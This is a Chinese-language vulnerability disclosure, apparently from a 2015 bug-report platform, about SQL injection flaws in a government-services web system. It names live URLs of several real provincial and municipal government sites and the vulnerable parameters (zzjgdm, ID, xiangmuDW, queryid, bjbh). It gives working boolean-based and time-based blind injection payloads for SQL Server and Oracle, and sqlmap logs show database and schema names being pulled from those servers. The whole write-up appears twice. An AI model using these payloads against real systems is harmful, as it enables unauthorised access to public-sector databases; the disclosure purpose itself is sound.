### 简要描述:
深夜来一发
### 详细说明:
深圳太极软件有限公司是一套专门的政务服务系统,大量用户在用。这个就不多说了。
注入点:
```
http://www.gzegn.gov.cn:8080/application/gzhd/bgxz/showdepartments.jsp?zzjgdm=009390359&depName=%CA%A1%C3%F1%D5%FE%CC%FC
```
zzjgdm=存在注入,就以贵州省电子政务为例,仅跑出表,其他不做测试。
payload:
```
Place: GET
Parameter: zzjgdm
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: zzjgdm=009390359' AND 4047=4047 AND 'ZDFM'='ZDFM&depName=%CA%A1%C3%F1%D5%FE%CC%FC
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: zzjgdm=009390359' AND 3874=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'mJmn'='mJmn&depName=%CA%A1%C3%F1%D5%FE%CC%FC
```
[<img src="https://images.seebug.org/upload/201504/150336083ea8abe6ec12d85d3679afebeecd7fa1.png" alt="太极软件.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/150336083ea8abe6ec12d85d3679afebeecd7fa1.png)
```
http://www.cqspbxz.com/application/gzhd/bgxz/showdepartments.jsp?zzjgdm=009290753&depName=%C7%F8%B7%BF%B9%DC%BE%D6
```
```
Parameter: zzjgdm
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: zzjgdm=009290753' AND 2319=2319 AND 'ZTze'='ZTze&depName=%C7%F8%B7%BF%B9%DC%BE%D6
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: zzjgdm=009290753' AND 9798=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'Uvqz'='Uvqz&depName=%C7%F8%B7%BF%B9%DC%BE%D6
---
[10:06:26] [INFO] testing Microsoft SQL Server
[10:06:26] [INFO] confirming Microsoft SQL Server
[10:06:28] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
[10:06:28] [INFO] fetching database names
[10:06:28] [INFO] fetching number of databases
[10:06:28] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[10:06:28] [INFO] retrieved: 21
```
[<img src="https://images.seebug.org/upload/201504/1512303796f50620dfdef3f72ca895d30a021564.png" alt="太极软件1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/1512303796f50620dfdef3f72ca895d30a021564.png)
```
```
```
http://www.ddkspdt.com/application/gzhd/bgxz/showdepartments.jsp?zzjgdm=009286236&depName=%C7%F8%D6%CA%BC%E0%BE%D6
```
#2:
/showZXInfo.jsp?ID=存在注入
```
http://www.cqszzw.gov.cn/application/gzhd/zxzx/showZXInfo.jsp?ID=20111219175109007
```
payload:
```
Place: GET
Parameter: ID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ID=20111219175109007' AND 4863=4863 AND 'hsAz'='hsAz
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: ID=20111219175109007' AND 4007=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'VBTD'='VBTD
---
[00:47:43] [INFO] testing Microsoft SQL Server
[00:47:43] [INFO] confirming Microsoft SQL Server
[00:47:45] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
[00:47:45] [INFO] fetching database names
[00:47:45] [INFO] fetching number of databases
[00:47:45] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[00:47:45] [INFO] retrieved: 5
[00:47:47] [INFO] retrieved: master
[00:48:03] [INFO] retrieved: model
[00:48:17] [INFO] retrieved: msdb
[00:48:30] [INFO] retrieved: tempdb
[00:48:47] [INFO] retrieved: web_shizhu
```
[<img src="https://images.seebug.org/upload/201504/151235443f2bccdf54b32c4ad73f8cb51cdd0326.png" alt="太极软件2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/151235443f2bccdf54b32c4ad73f8cb51cdd0326.png)
#3:
在这个文件下/zwugk.jsp,多个参数存在注入,zwugk.jsp?selectpageno=95&shouliId=&xiangmuDW=&button=%E6%9F%A5%E8%AF%A2
```
http://61.183.35.105/application/wsbs/zwugk.jsp?selectpageno=95&shouliId=&xiangmuDW=&button=%E6%9F%A5%E8%AF%A2
```
```
Place: GET
Parameter: xiangmuDW
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: selectpageno=95&shouliId=&xiangmuDW=%' AND 3105=3105 AND '%'='&button=%E6%9F%A5%E8%AF%A2
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: selectpageno=95&shouliId=&xiangmuDW=%' AND 2511=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(90)||CHR(103)||CHR(115),5) AND '%'='&button=%E6%9F%A5%E8%AF%A2
---
[12:56:54] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[12:56:54] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[12:56:54] [INFO] fetching database (schema) names
[12:56:54] [INFO] fetching number of databases
[12:56:54] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[12:56:54] [INFO] retrieved: 19
[12:57:35] [INFO] retrieved: CTXSYS
[13:00:49] [INFO] retrieved: DBSNMP
```
[<img src="https://images.seebug.org/upload/201504/151308178b9543d4a6475ac2021e8ea5ab849b90.png" alt="太极软件3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/151308178b9543d4a6475ac2021e8ea5ab849b90.png)
```
http://www.cqszzw.gov.cn/application/wsbs/zwugk.jsp?queryid=111
```
```
Place: GET
Parameter: queryid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: queryid=111%' AND 1542=1542 AND '%'='
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: queryid=111%' AND 3688=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND '%'='
---
[12:41:26] [INFO] testing Microsoft SQL Server
[12:41:30] [INFO] confirming Microsoft SQL Server
[12:41:34] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
[12:41:34] [INFO] fetching database names
[12:41:34] [INFO] fetching number of databases
[12:41:34] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[12:41:34] [INFO] retrieved: 5
[12:41:45] [INFO] retrieved: master
[12:43:10] [INFO] retrieved: model
[12:44:11] [INFO] retrieved: msdb
[12:45:10] [INFO] retrieved: tempdb
[12:46:22] [INFO] retrieved: web_shizhu
```
[<img src="https://images.seebug.org/upload/201504/151311293635691b7b4738f7a8345fc14b9eafb9.png" alt="太极软件4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/151311293635691b7b4738f7a8345fc14b9eafb9.png)
```
http://www.xazwfw.com/application/wsbs/zwugk.jsp?selectpageno=16&shouliId=&xiangmuDW=&button=%E6%9F%A5%E8%AF%A2
```
```
---
Place: GET
Parameter: xiangmuDW
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: selectpageno=16&shouliId=&xiangmuDW=%' AND 4085=4085 AND '%'='&button=%E6%9F%A5%E8%AF%A2
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: selectpageno=16&shouliId=&xiangmuDW=%' AND 1823=DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(106)||CHR(100)||CHR(122),5) AND '%'='&button=%E6%9F%A5%E8%AF%A2
---
[02:23:57] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[02:23:57] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[02:23:57] [INFO] fetching database (schema) names
[02:23:57] [INFO] fetching number of databases
[02:23:57] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[02:23:57] [INFO] retrieved: 18
[02:24:26] [INFO] retrieved: CTXSYS
[02:26:44] [INFO] retrieved: DBSNMP
[02:29:00] [INFO] retrieved: DMSYS
[02:30:52] [INFO] retrieved: DZJC
[02:32:26] [INFO] retrieved: DZJC_XIANAN_HB
[02:36:45] [INFO] retrieved: EXFSYS
[02:38:53] [INFO] retrieved: MDSYS
[02:40:44] [INFO] retrieved: OLAPSYS
[02:43:03] [INFO] retrieved: ORDSYS
[02:45:17] [INFO] retrieved: OUTLN
[02:47:31] [INFO] retrieved: SCOTT
[02:49:16] [INFO] retrieved: SYS
[02:50:20] [INFO] retrieved: SYSMAN
[02:52:11] [INFO] retrieved: SYSTEM
[02:54:16] [INFO] retrieved: TSMSYS
[02:56:24] [INFO] retrieved: WMSYS
[02:58:21] [INFO] retrieved: WZ_XIANAN_HB
[03:02:26] [INFO] retrieved: XDB
available databases [18]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] DZJC
[*] DZJC_XIANAN_HB
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] WZ_XIANAN_HB
[*] XDB
[03:03:36] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.xazwfw.com'
```
[<img src="https://images.seebug.org/upload/201504/15131434445b012e585ed0fbd26b0aeb820506be.png" alt="太极软件5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/15131434445b012e585ed0fbd26b0aeb820506be.png)
#4:
resultsp.jsp?bjbh=存在注入
```
http://222.86.58.9:8088/application/jsp/resultsp.jsp?bjbh=
```
```
Place: GET
Parameter: bjbh
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: bjbh=111' AND 3031=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(79)||CHR(67)||CHR(87),5) AND 'jxlx'='jxlx
---
[13:22:25] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003 or 2000
web application technology: Servlet 2.4, JSP, JSP 2.0
back-end DBMS: Oracle
[13:22:25] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[13:22:25] [INFO] fetching database (schema) names
[13:22:25] [INFO] fetching number of databases
[13:22:25] [WARNING] time-based comparison requires larger statistical model, please wait..............................
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[13:22:41] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[13:22:44] [INFO] adjusting time delay to 1 second due to good response times
[13:22:45] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[13:22:45] [ERROR] unable to retrieve the number of databases
[13:22:45] [INFO] falling back to current database
[13:22:45] [INFO] fetching current database
[13:22:45] [INFO] resumed: GUIZHOU_DZJC
[13:22:45] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
[13:22:45] [INFO] fetching tables for database: 'GUIZHOU_DZJC'
[13:22:45] [INFO] fetching number of tables for database 'GUIZHOU_DZJC'
[13:22:45] [INFO] retrieved: 10
[13:22:58] [ERROR] invalid character detected. retrying..
[13:22:58] [WARNING] increasing time delay to 2 seconds
9
[13:23:07] [INFO] retrieved: T_JC_XZ
```
[<img src="https://images.seebug.org/upload/201504/15132622b8e56ea7fba3db9006daecca8770906b.png" alt="太极软件6.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/15132622b8e56ea7fba3db9006daecca8770906b.png)
### 漏洞证明:
深圳太极软件有限公司是一套专门的政务服务系统,大量用户在用。这个就不多说了。
注入点:
```
http://www.gzegn.gov.cn:8080/application/gzhd/bgxz/showdepartments.jsp?zzjgdm=009390359&depName=%CA%A1%C3%F1%D5%FE%CC%FC
```
zzjgdm=存在注入,就以贵州省电子政务为例,仅跑出表,其他不做测试。
payload:
```
Place: GET
Parameter: zzjgdm
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: zzjgdm=009390359' AND 4047=4047 AND 'ZDFM'='ZDFM&depName=%CA%A1%C3%F1%D5%FE%CC%FC
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: zzjgdm=009390359' AND 3874=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'mJmn'='mJmn&depName=%CA%A1%C3%F1%D5%FE%CC%FC
```
[<img src="https://images.seebug.org/upload/201504/150336083ea8abe6ec12d85d3679afebeecd7fa1.png" alt="太极软件.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/150336083ea8abe6ec12d85d3679afebeecd7fa1.png)
```
http://www.cqspbxz.com/application/gzhd/bgxz/showdepartments.jsp?zzjgdm=009290753&depName=%C7%F8%B7%BF%B9%DC%BE%D6
```
```
Parameter: zzjgdm
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: zzjgdm=009290753' AND 2319=2319 AND 'ZTze'='ZTze&depName=%C7%F8%B7%BF%B9%DC%BE%D6
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: zzjgdm=009290753' AND 9798=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'Uvqz'='Uvqz&depName=%C7%F8%B7%BF%B9%DC%BE%D6
---
[10:06:26] [INFO] testing Microsoft SQL Server
[10:06:26] [INFO] confirming Microsoft SQL Server
[10:06:28] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
[10:06:28] [INFO] fetching database names
[10:06:28] [INFO] fetching number of databases
[10:06:28] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[10:06:28] [INFO] retrieved: 21
```
[<img src="https://images.seebug.org/upload/201504/1512303796f50620dfdef3f72ca895d30a021564.png" alt="太极软件1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/1512303796f50620dfdef3f72ca895d30a021564.png)
```
```
```
http://www.ddkspdt.com/application/gzhd/bgxz/showdepartments.jsp?zzjgdm=009286236&depName=%C7%F8%D6%CA%BC%E0%BE%D6
```
#2:
/showZXInfo.jsp?ID=存在注入
```
http://www.cqszzw.gov.cn/application/gzhd/zxzx/showZXInfo.jsp?ID=20111219175109007
```
payload:
```
Place: GET
Parameter: ID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ID=20111219175109007' AND 4863=4863 AND 'hsAz'='hsAz
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: ID=20111219175109007' AND 4007=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'VBTD'='VBTD
---
[00:47:43] [INFO] testing Microsoft SQL Server
[00:47:43] [INFO] confirming Microsoft SQL Server
[00:47:45] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
[00:47:45] [INFO] fetching database names
[00:47:45] [INFO] fetching number of databases
[00:47:45] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[00:47:45] [INFO] retrieved: 5
[00:47:47] [INFO] retrieved: master
[00:48:03] [INFO] retrieved: model
[00:48:17] [INFO] retrieved: msdb
[00:48:30] [INFO] retrieved: tempdb
[00:48:47] [INFO] retrieved: web_shizhu
```
[<img src="https://images.seebug.org/upload/201504/151235443f2bccdf54b32c4ad73f8cb51cdd0326.png" alt="太极软件2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/151235443f2bccdf54b32c4ad73f8cb51cdd0326.png)
#3:
在这个文件下/zwugk.jsp,多个参数存在注入,zwugk.jsp?selectpageno=95&shouliId=&xiangmuDW=&button=%E6%9F%A5%E8%AF%A2
```
http://61.183.35.105/application/wsbs/zwugk.jsp?selectpageno=95&shouliId=&xiangmuDW=&button=%E6%9F%A5%E8%AF%A2
```
```
Place: GET
Parameter: xiangmuDW
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: selectpageno=95&shouliId=&xiangmuDW=%' AND 3105=3105 AND '%'='&button=%E6%9F%A5%E8%AF%A2
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: selectpageno=95&shouliId=&xiangmuDW=%' AND 2511=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(90)||CHR(103)||CHR(115),5) AND '%'='&button=%E6%9F%A5%E8%AF%A2
---
[12:56:54] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[12:56:54] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[12:56:54] [INFO] fetching database (schema) names
[12:56:54] [INFO] fetching number of databases
[12:56:54] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[12:56:54] [INFO] retrieved: 19
[12:57:35] [INFO] retrieved: CTXSYS
[13:00:49] [INFO] retrieved: DBSNMP
```
[<img src="https://images.seebug.org/upload/201504/151308178b9543d4a6475ac2021e8ea5ab849b90.png" alt="太极软件3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/151308178b9543d4a6475ac2021e8ea5ab849b90.png)
```
http://www.cqszzw.gov.cn/application/wsbs/zwugk.jsp?queryid=111
```
```
Place: GET
Parameter: queryid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: queryid=111%' AND 1542=1542 AND '%'='
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: queryid=111%' AND 3688=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND '%'='
---
[12:41:26] [INFO] testing Microsoft SQL Server
[12:41:30] [INFO] confirming Microsoft SQL Server
[12:41:34] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
[12:41:34] [INFO] fetching database names
[12:41:34] [INFO] fetching number of databases
[12:41:34] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[12:41:34] [INFO] retrieved: 5
[12:41:45] [INFO] retrieved: master
[12:43:10] [INFO] retrieved: model
[12:44:11] [INFO] retrieved: msdb
[12:45:10] [INFO] retrieved: tempdb
[12:46:22] [INFO] retrieved: web_shizhu
```
[<img src="https://images.seebug.org/upload/201504/151311293635691b7b4738f7a8345fc14b9eafb9.png" alt="太极软件4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/151311293635691b7b4738f7a8345fc14b9eafb9.png)
```
http://www.xazwfw.com/application/wsbs/zwugk.jsp?selectpageno=16&shouliId=&xiangmuDW=&button=%E6%9F%A5%E8%AF%A2
```
```
---
Place: GET
Parameter: xiangmuDW
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: selectpageno=16&shouliId=&xiangmuDW=%' AND 4085=4085 AND '%'='&button=%E6%9F%A5%E8%AF%A2
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: selectpageno=16&shouliId=&xiangmuDW=%' AND 1823=DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(106)||CHR(100)||CHR(122),5) AND '%'='&button=%E6%9F%A5%E8%AF%A2
---
[02:23:57] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[02:23:57] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[02:23:57] [INFO] fetching database (schema) names
[02:23:57] [INFO] fetching number of databases
[02:23:57] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[02:23:57] [INFO] retrieved: 18
[02:24:26] [INFO] retrieved: CTXSYS
[02:26:44] [INFO] retrieved: DBSNMP
[02:29:00] [INFO] retrieved: DMSYS
[02:30:52] [INFO] retrieved: DZJC
[02:32:26] [INFO] retrieved: DZJC_XIANAN_HB
[02:36:45] [INFO] retrieved: EXFSYS
[02:38:53] [INFO] retrieved: MDSYS
[02:40:44] [INFO] retrieved: OLAPSYS
[02:43:03] [INFO] retrieved: ORDSYS
[02:45:17] [INFO] retrieved: OUTLN
[02:47:31] [INFO] retrieved: SCOTT
[02:49:16] [INFO] retrieved: SYS
[02:50:20] [INFO] retrieved: SYSMAN
[02:52:11] [INFO] retrieved: SYSTEM
[02:54:16] [INFO] retrieved: TSMSYS
[02:56:24] [INFO] retrieved: WMSYS
[02:58:21] [INFO] retrieved: WZ_XIANAN_HB
[03:02:26] [INFO] retrieved: XDB
available databases [18]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] DZJC
[*] DZJC_XIANAN_HB
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] WZ_XIANAN_HB
[*] XDB
[03:03:36] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.xazwfw.com'
```
[<img src="https://images.seebug.org/upload/201504/15131434445b012e585ed0fbd26b0aeb820506be.png" alt="太极软件5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/15131434445b012e585ed0fbd26b0aeb820506be.png)
#4:
resultsp.jsp?bjbh=存在注入
```
http://222.86.58.9:8088/application/jsp/resultsp.jsp?bjbh=
```
```
Place: GET
Parameter: bjbh
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: bjbh=111' AND 3031=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(79)||CHR(67)||CHR(87),5) AND 'jxlx'='jxlx
---
[13:22:25] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003 or 2000
web application technology: Servlet 2.4, JSP, JSP 2.0
back-end DBMS: Oracle
[13:22:25] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[13:22:25] [INFO] fetching database (schema) names
[13:22:25] [INFO] fetching number of databases
[13:22:25] [WARNING] time-based comparison requires larger statistical model, please wait..............................
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[13:22:41] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[13:22:44] [INFO] adjusting time delay to 1 second due to good response times
[13:22:45] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[13:22:45] [ERROR] unable to retrieve the number of databases
[13:22:45] [INFO] falling back to current database
[13:22:45] [INFO] fetching current database
[13:22:45] [INFO] resumed: GUIZHOU_DZJC
[13:22:45] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
[13:22:45] [INFO] fetching tables for database: 'GUIZHOU_DZJC'
[13:22:45] [INFO] fetching number of tables for database 'GUIZHOU_DZJC'
[13:22:45] [INFO] retrieved: 10
[13:22:58] [ERROR] invalid character detected. retrying..
[13:22:58] [WARNING] increasing time delay to 2 seconds
9
[13:23:07] [INFO] retrieved: T_JC_XZ
```
[<img src="https://images.seebug.org/upload/201504/15132622b8e56ea7fba3db9006daecca8770906b.png" alt="太极软件6.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/15132622b8e56ea7fba3db9006daecca8770906b.png)
京公网安备 11010502034610号
暂无评论